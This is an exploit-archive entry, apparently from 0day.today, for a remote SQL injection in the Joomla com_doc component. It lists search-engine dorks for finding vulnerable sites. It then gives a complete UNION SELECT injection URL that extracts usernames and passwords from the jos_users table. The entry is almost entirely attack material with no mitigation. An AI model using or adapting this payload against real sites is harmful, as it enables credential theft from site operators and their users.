id: 2612
date: 02/07/2008
title: Joomla Component com_doc Remote SQL Injection Vulnerability
author: S@BUN
cves: 

===========================================================
Joomla Component com_doc Remote SQL Injection Vulnerability
===========================================================



#########################################################################
#
# Commonwealth Business Council SQL Injection
#
#########################################################################
#
# DORK 1 : allinurl: "index.php?option=com_doc"
#
# DORK 2: "Commonwealth Business Council
#
##########################################################################
EXPLOIT :

index.php?option=com_doc&task=view&sid=-1/**/union/**/select/**/concat(username,0x3a,password),1,2,concat(username,0x3a,password),0x3a,5,6,7,8,password,username,11/**/from/**/jos_users/






#  0day.today [2023-03-22]  #